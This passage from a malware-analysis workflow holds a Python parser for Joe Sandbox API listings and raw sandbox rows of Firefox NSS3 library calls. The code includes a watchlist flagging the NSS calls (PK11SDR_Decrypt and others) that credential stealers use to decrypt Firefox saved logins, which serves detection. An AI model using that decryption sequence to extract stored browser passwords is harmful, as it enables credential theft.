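    r"(?:\((?P<args>.*)\))?"          # argument list is optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # raw argument tokens; "?" where the plugin could not resolve one
    ref: int               # address of the call site
    parent: Optional[int]  # containing function when the row is a subcall row


def parse_api_listing(text):
    """Return one ApiCall per bullet row; lines that are not API rows are skipped."""
    calls = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] else ()
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), parent))
    return calls


def module_histogram(calls):
    """Count calls per module: a quick view of which DLLs a function leans on."""
    return Counter(c.module for c in calls)


# Signed 32-bit bases of the NSPR/NSS error ranges (prerr.h, secerr.h, sslerr.h).
ERROR_BASES = {
    "PR_NSPR_ERROR_BASE": -6000,
    "SEC_ERROR_BASE": -0x2000,
    "SSL_ERROR_BASE": -0x3000,
}


def decode_nss_error(hex_arg):
    """Map a PR_SetError first argument such as FFFFE005 to (base name, offset).

    The listing prints the code as an unsigned 32-bit hex value; NSS error codes
    are negative, so reinterpret it as signed and pick the nearest base below it.
    The offset indexes the enum in the matching header.  Returns None when the
    value lies outside every known range."""
    value = int(hex_arg, 16)
    if value >= 0x80000000:
        value -= 0x100000000
    candidates = [(name, base) for name, base in ERROR_BASES.items() if base <= value < 0]
    if not candidates:
        return None
    name, base = max(candidates, key=lambda nb: nb[1])
    return name, value - base


def set_error_sites(calls):
    """(call-site address, decoded error) for every PR_SetError row."""
    return [(c.ref, decode_nss_error(c.args[0]))
            for c in calls if c.api == "PR_SetError" and c.args]


# Assumed analyst watchlist: NSS entry points stealers call to decrypt Firefox
# logins.json.  Seeing them in a non-browser process is worth a closer look.
CREDENTIAL_WATCHLIST = {"NSS_Init", "PK11_GetInternalKeySlot",
                        "PK11_Authenticate", "PK11SDR_Decrypt"}


def flag_credential_access(calls):
    return [c for c in calls if c.module == "NSS3" and c.api in CREDENTIAL_WATCHLIST]


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    print(dict(module_histogram(parsed)))
    for ref, err in set_error_sites(parsed):
        print(f"{ref:08X}: {err}")
    for c in flag_credential_access(parsed):
        print(f"watchlist hit: {c.api} at {c.ref:08X}")
```

Run it against any block of rows pasted from the report; rows that do not match the grammar (hash lines, dump paths) are ignored, so a whole record can be fed in unchanged. The decoder deliberately returns only the range and offset rather than a symbol name, so it stays correct across NSS versions whose enums differ in their later entries.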
APIs
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E0B
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E24
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C471E3B
• PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471E8A
• PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471EAD
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1529734605-0
                                                                                                                                                                                                                          • Opcode ID: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                          • Instruction ID: 2769958b98d2b8984ef7d237bb316a0049d0f6c502fb4ada5162b73544ee4a5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3221F172E08210A7E710DE68DC51F8A73949B84329F154638FD6D57B80E730E90887E2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?,?,6C49002B,?), ref: 6C491875
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C49002B,?), ref: 6C49188E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C49002B,?), ref: 6C4918A7
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?,?,?,?,6C49002B,?), ref: 6C491905
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C49002B,?), ref: 6C491912
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
• String ID:
• API String ID: 3539092540-0
• Opcode ID: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
• Instruction ID: b0ccaa5d021d374cbd0cf9815fed14040660a14f2c188a6f392211dd70ca8444
• Opcode Fuzzy Hash: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
• Instruction Fuzzy Hash: 19214F74A446259BDB00EF79C484E99BBF8FF06359F114A29D894C7B00E730E994CBD2
APIs
• PR_GetCurrentThread.NSS3 ref: 6C581E5C
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
• PR_Lock.NSS3(00000000), ref: 6C581E75
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581EAB
• PR_GetCurrentThread.NSS3 ref: 6C581ED0
• PR_Unlock.NSS3(?), ref: 6C581EE8
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CurrentThread$ErrorLockUnlockValue
• String ID:
• API String ID: 121300776-0
• Opcode ID: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
• Instruction ID: 0e3e7c132015e4ad3ee8e112b9a22b1ad29bcedb377a46287772c0c6ffe5da16
• Opcode Fuzzy Hash: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
• Instruction Fuzzy Hash: CB217C74A165229BD710CF19DD40A47BBB1BF84718B258225D8299BF40D730FC54CBE5
APIs
• SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
  • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
• SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
• PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?,?), ref: 6C4CBED7
• SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEEB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
• String ID:
• API String ID: 1367977078-0
• Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
• Instruction ID: ab2c2be9772e236b6143e70a005437e47bdafe2eb4cfcf9abd24b3cec9ea5c4f
• Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
• Instruction Fuzzy Hash: 9711EFAEB0465567E700C965AC80F6B776D9B80B9AF044125FE04C7B72E721D80486E3
APIs
• PORT_ArenaMark_Util.NSS3(00000000,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADA7
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADB4
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SECITEM_CopyItem_Util.NSS3(00000000,?,6C473FFF,?,?,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000), ref: 6C47ADD5
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5994B0,?,?,?,?,?,?,?,?,6C473FFF,00000000,?), ref: 6C47ADEC
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C473FFF), ref: 6C47AE3C
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
• String ID:
• API String ID: 2372449006-0
• Opcode ID: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
• Instruction ID: d2e5103eb81cf54c8e6015b8f7604ffc411613f053b59e58ee46a999982467ab
• Opcode Fuzzy Hash: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
• Instruction Fuzzy Hash: 2B110371E002045BE720EA659C51FFF73B8DF9125EF04462CEC1996B41FB20E95882E2
APIs
• TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
• TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
• EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
• PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
• PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
• String ID:
• API String ID: 2759447159-0
• Opcode ID: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
• Instruction ID: 6963236ddda4e214036d55c625ea72ba7a5e0ded6c1e85f8c3ed32d6c2428bac
• Opcode Fuzzy Hash: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
• Instruction Fuzzy Hash: E62171B8A04605CFDB00EF78C884D6AB7B4FF05309F11466ADC9496B15E730E995CBA6
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C4CF893
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• SECITEM_CopyItem_Util.NSS3(00000000,?,6C4866A0), ref: 6C4CF8AA
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF8B9
  • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
  • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
  • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
  • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
  • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
  • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
  • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
  • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
  • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
• PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4CF8D9
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5A18E0), ref: 6C4CF905
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena$Pool$Alloc_Arena_CriticalFreeItem_Sectionfree$CallClearCopyDecodeDeleteEnterInitLockOnceQuickUnlockValuecallocmemcpy
• String ID:
• API String ID: 3757084236-0
• Opcode ID: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
• Instruction ID: 8320ece035ad6f9b0ad77ebfb265c9857967d14e0b51760801d08d260bc29769
• Opcode Fuzzy Hash: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
• Instruction Fuzzy Hash: 2D110476F013006BF300DB259D41F6B7AE89B85698F01412DEC148B791FB75D50883E3
APIs
• PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C490710), ref: 6C488FF1
• PR_CallOnce.NSS3(6C5D2158,6C489150,00000000,?,?,?,6C489138,?,6C490710), ref: 6C489029
• calloc.MOZGLUE(00000001,00000000,?,?,6C490710), ref: 6C48904D
• memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C490710), ref: 6C489066
• PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C490710), ref: 6C489078
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: PrivateThread$CallOncecallocmemcpy
• String ID:
• API String ID: 1176783091-0
• Opcode ID: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
• Instruction ID: 1dd691c671402ce6473c33a2dba8d20b8a5e8eab85e9fc1314ec3e950e949eba
• Opcode Fuzzy Hash: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
• Instruction Fuzzy Hash: BC112571702611A7EB109AADAC04E6A32B8DBD37AEF410021FC44D6B41F753CD45D3E9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: TlsGetValue.KERNEL32 ref: 6C4B1E36
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C48B1EE,2404110F,?,?), ref: 6C4B1E4B
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: PR_Unlock.NSS3 ref: 6C4B1E76
                                                                                                                                                                                                                          • free.MOZGLUE(?,6C49D079,00000000,00000001), ref: 6C49CDA5
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C49D079,00000000,00000001), ref: 6C49CDB6
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C49D079,00000000,00000001), ref: 6C49CDCF
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C49D079,00000000,00000001), ref: 6C49CDE2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C49CDE9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                                                          • Opcode ID: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                          • Instruction ID: f50506942599283d39f39aa7f748cf5e1143ee77b6f5011a922901c387afe0eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951102B2B01521ABEF00EEA5EC44D96BB2DFF0425A7000225E90997E11E332F534C7E1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502CEC
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502D02
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502D1F
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502D42
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502D5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                          • Instruction ID: 631d4fc9a4ffd91310cd5d46b4db2694e9dcc4dee6cdd6649fa00f2a952327f4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 020165F6A142009BE7309E25FC45B87B7A5EB95318F004525E95DC6B20F632FD16C692
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502D9C
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502DB2
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502DCF
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502DF2
